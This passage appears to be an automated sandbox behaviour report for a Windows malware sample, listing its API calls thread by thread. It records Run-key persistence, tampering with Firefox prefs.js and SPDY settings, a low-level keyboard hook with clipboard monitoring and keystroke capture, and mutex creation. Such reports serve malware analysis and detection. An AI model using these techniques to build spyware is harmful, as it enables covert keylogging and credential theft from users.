| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = api--1-0, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegSetValueExW, address_out = 0x7feff131ed0 |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = api--1-0, data = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe, size = 132, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6\bdeskmgr.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = StrRChrW, address_out = 0x7fefe59b85c |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, type = size |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, size = 5440, size_out = 5440 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = StrStrIA, address_out = 0x7fefe595a1c |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, size = 48 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = EnableSPDY3_0, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Thread 0x8b8
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0x718
55
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = Unknown module name, base_address = 0xff140000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SetWindowsHookExA, address_out = 0x76e18c20 |
|
1 | |
| System | Register Hook | type = WH_KEYBOARD_LL, hookproc_address = 0x3fba1c4 |
|
1 | |
| System | Get Time | type = Ticks, time = 162443 |
|
1 | |
| Module | Get Handle | module_name = Unknown module name, base_address = 0xff140000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegisterClassA, address_out = 0x76df9f68 |
|
1 | |
| Module | Get Handle | module_name = Unknown module name, base_address = 0xff140000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CreateWindowExA, address_out = 0x76dfa2e0 |
|
1 | |
| Window | Create | class_name = {228B1CEE-3F75-CA50-026F-56138479F8BD}, wndproc_parameter = 66903120 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetWindowLongPtrA, address_out = 0x76e037c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = DefWindowProcA, address_out = 0x76f0f548 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SetWindowLongPtrA, address_out = 0x76dfb500 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SetClipboardViewer, address_out = 0x76e0f780 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = IsClipboardFormatAvailable, address_out = 0x76e15b10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegisterDeviceNotificationA, address_out = 0x76df6fe4 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetMessageA, address_out = 0x76e06110 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = TranslateMessage, address_out = 0x76e096f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = DispatchMessageA, address_out = 0x76e06274 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetForegroundWindow, address_out = 0x76e05ab0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = AttachThreadInput, address_out = 0x76dfd240 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetFocus, address_out = 0x76e06570 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetModuleBaseNameA, address_out = 0x770b125c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetAncestor, address_out = 0x76e04fc0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetKeyboardState, address_out = 0x76e18a10 |
|
1 | |
| Keyboard | Read | result_out = 1 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetKeyboardLayout, address_out = 0x76e06610 |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 2412, result_out = 67699721 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetAsyncKeyState, address_out = 0x76dfc720 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = ToUnicodeEx, address_out = 0x76e0d5c4 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetModuleFileNameExW, address_out = 0x770b1010 |
|
1 | |
| Module | Get Filename | module_name = KERNEL32.dll, process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-03-29 15:43:57 (UTC) |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetWindowTextW, address_out = 0x76dfd7a4 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CallNextHookEx, address_out = 0x76dfbae0 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Keyboard | Read | result_out = 1 |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 2412, result_out = 67699721 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Keyboard | Read | result_out = 1 |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 2412, result_out = 67699721 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = KERNEL32.dll, process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-03-29 15:44:02 (UTC) |
|
1 |
Thread 0x75c
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0x974
16
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Open | mutex_name = Local\{722AD44B-2987-7426-43C6-6DE8275AF19C}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Mutex | Create | mutex_name = Local\{722AD44B-2987-7426-43C6-6DE8275AF19C} |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = PathFindFileNameA, address_out = 0x7fefe5986c4 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580, value_name = {70017650-0FA6-225C-19A4-B3765D18970A}, type = REG_NONE |
|
1 | |
| System | Get Time | type = System Time, time = 2018-03-29 15:43:42 (UTC) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegSetValueExA, address_out = 0x7feff131dc0 |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580, value_name = {70017650-0FA6-225C-19A4-B3765D18970A}, size = 8, type = REG_BINARY |
|
1 | |
| Mutex | Open | mutex_name = Local\{FCF9E212-2B0D-8EC0-95F0-8FA2992433F6}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Mutex | Create | mutex_name = Local\{FCF9E212-2B0D-8EC0-95F0-8FA2992433F6} |
|
1 | |
| Mutex | Open | mutex_name = Local\{6A5E21FF-C1FA-2C95-9B3E-8520FF528954}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Mutex | Create | mutex_name = Local\{6A5E21FF-C1FA-2C95-9B3E-8520FF528954} |
|
1 | |
| Mutex | Release | mutex_name = Local\{722AD44B-2987-7426-43C6-6DE8275AF19C} |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
